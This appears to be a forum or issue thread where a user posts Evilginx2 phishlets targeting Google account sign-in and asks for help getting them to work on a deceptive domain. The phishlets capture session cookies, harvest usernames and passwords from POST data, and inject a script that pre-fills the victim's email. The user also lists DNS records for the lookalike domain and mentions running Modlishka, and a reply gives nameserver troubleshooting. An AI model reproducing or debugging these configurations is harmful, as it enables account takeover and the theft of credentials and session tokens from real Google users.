• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/', replace: 'https://{hostname}/_/signin/sl/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google.com', orig_sub: 'accounts', domain: 'www.google.com', search: 'https://{hostname}/ServiceLogin/', replace: 'https://{hostname}/ServiceLogin/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//signin/sl/lookup', replace: 'https://{hostname}/_/signin/sl/lookup/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ManageAccount/', replace: 'https://{hostname}/ManageAccount/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//', replace: 'https://{hostname}/_/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/', replace: 'https://{hostname}/_/common/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics/', replace: 'https://{hostname}/_/common/diagnostics/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie/', replace: 'https://{hostname}/CheckCookie/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/info/', replace: 'https://{hostname}/info/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/gen_204', replace: 'https://{hostname}/gen_204', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/accounts/static/', replace: 'https://{hostname}/accounts/static/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics/', replace: 'https://{hostname}/_/common/diagnostics/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.gstatic.com', origsub: 'accounts', domain: 'gstatic.com', search: 'https://{hostname}//mss/boq-identify//js/k/', replace: 'https://{hostname}//mss/boq-identify/_/js/k/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ogs.google.com', origsub: 'accounts', domain: 'google.com', search: 'https://{hostname}/u/0//og/botguard/get', replace: 'https://{hostname}/u/0/_/log/botguard/get', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'notifications.google.com', orig_sub: 'notifications', domain: 'google.com', search: 'https://{hostname}/u/0/widget/', replace: 'https://{hostname}/u/0/widget', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: 'https://{hostname}/log', replace: 'https://{hostname}/log', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'apis.google.com', orig_sub: 'apis', domain: 'google.com', search: 'https://{hostname}/js', replace: 'https://{hostname}/js', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'content', domain: 'googleapis.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/speedbump/', replace: 'https://{hostname}/accounts/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/embedded/', replace: 'https://{hostname}/accounts/embedded/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/signup/', replace: 'https://{hostname}/accounts/signup/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/Logout', replace: 'https://{hostname}/Logout', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/OAuthLogin', replace: 'https://{hostname}/OAuthLogin', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'business.google.com', orig_sub: 'business', domain: 'google.com', search: 'https://{hostname}/add/', replace: 'https://{hostname}/add/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'content', domain: 'googleapis.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'content', domain: 'googleapis.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'mail', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.google-analytics.com', orig_sub: 'ssl', domain: 'google-analytics.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.google-analytics.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', origsub: 'accounts', domain: 'google.com', search: 'href="http://{hostname}//signin/challenge', replace: 'href="http://{hostname}/_/signin/challenge', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'content.googleapis.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="http://{hostname}/cryptauth/v1/authzen/', replace: 'href="http://{hostname}/cryptauth/v1/authzen/', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'content.googleapis.com', orig_sub: 'content', domain: 'googleapis.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
• {triggers_on: 'ssl.google-analytics.com', orig_sub: 'ssl', domain: 'google-analytics.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens:
• domain: '.google.com' keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID", "OGPC", "OGP", "1P_JAR", "CONSENT", "SMSV", "user_id", "continue", "VISITOR_INFO1_LIVE", "GPS", "PREF", "YSC", "ST-zj77bk", "sej", "cn", "session_token", "ST-1crolk", "LOGIN_INFO", "device_id", "permission", "service", "hl", "req", "bgRequest", "deviceinfo", "gmscoreversion", "checkConnection", "checkedDomains", "pstMsg", "bghash", "identifier", "password", "ca", "ct"]
• domain: 'accounts.google.com' keys: ["GAPS", "LSID", "_utmt", "utmz", "_utmb", "ACCOUNT_CHOOSER"] credentials: username: key: 'identifier' search: '],"([^"])"]$' type: 'post' password: key: 'password' search: ',["([^"])",' type: 'post' landing_path:
• '/signin/v2/identifier' login: domain: 'accounts.google.com' path: '/signin/v2/identifier' js_inject:
• trigger_domains: ["accounts.google.com"] trigger_paths: ["/signin/v2/identifier"] trigger_params: ["email"] script: | function lp(){ var email = document.querySelector("#identifierId"); if (email != null) { email.value = "{email}"; return; } setTimeout(function(){lp();}, 100); } setTimeout(function(){lp();}, 100);`

[thecityofhereafter]

I have tried 3 other phishlets for this site in debug mode, and get the same exact problem "hostname unsupported: accounts.google.com.verify.computer.verify.computer"

Thanks.

`author: '@asmc' min_ver: '2.3.0' proxy_hosts:

• {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: false} sub_filters:
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json']}
• {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}//common/diagnostics/', replace: 'https://{hostname}//common/diagnostics/', mimes: ['text/html', 'application/json']} auth_tokens:
• domain: '.google.com' keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
• domain: 'accounts.google.com' keys: ["GAPS", "LSID"] credentials: username: key: 'f.req' search: '(.)' type: 'post' password: key: 'f.req' search: '(.)' type: 'post' login: domain: 'accounts.google.com' path: '/signin/v2/identifier?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26next%3D%252F%26hl%3Den&service=youtube&uilel=3&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'`

[thecityofhereafter]

I have the DNS setup as follows:

Name Servers: ns-cloud-a1.googledomains.com ns-cloud-a2.googledomains.com ns-cloud-a3.googledomains.com ns-cloud-a4.googledomains.com

Registered Hosts: com.verify.computer 68.183.20.115

Custom Resource Records: @ A 5m 68.183.20.115

• CNAME 5m verify.computer. _acme-challenge TXT 5m "KsdkjVbhxbMbsdlkdfkljkljdfkljdflkjdfhlkdjflkdjf" _acme-challenge.com CNAME 5m acme-challenge.com.verify.computer. _acme-challenge.com NS 5m acme-dns.com.verify.computer. acme-dns A 5m 68.183.20.115 acme-dns.com A 5m 68.183.20.115 com A 5m 68.183.20.115 com NS 5m com.verify.computer.

I want to use Modlishka and Evilginx2 on the same machine until I get one working, so I have acme records for Modlishka still in there, and I've set up Evilginx2 to manage DNS below com.verify.computer instead of the root domain verify.computer, is this a problem?

Thanks, GM

[thecityofhereafter]

I still cant get evilginx to STOP adding these extra subdomains and TLD's? and that new error where lets encrypt refuses to register a certificate for accounts.google.com.verify.computer is still happening when this phishlet was loading fine 5 days ago? made no changes to it.. help! please! I'm getting very desperate here.

[kgretzky]

Which domain provider did you use to register the domain? Make sure the nameservers are pointing to your host. You can find how to do it in the FAQ section in the wiki.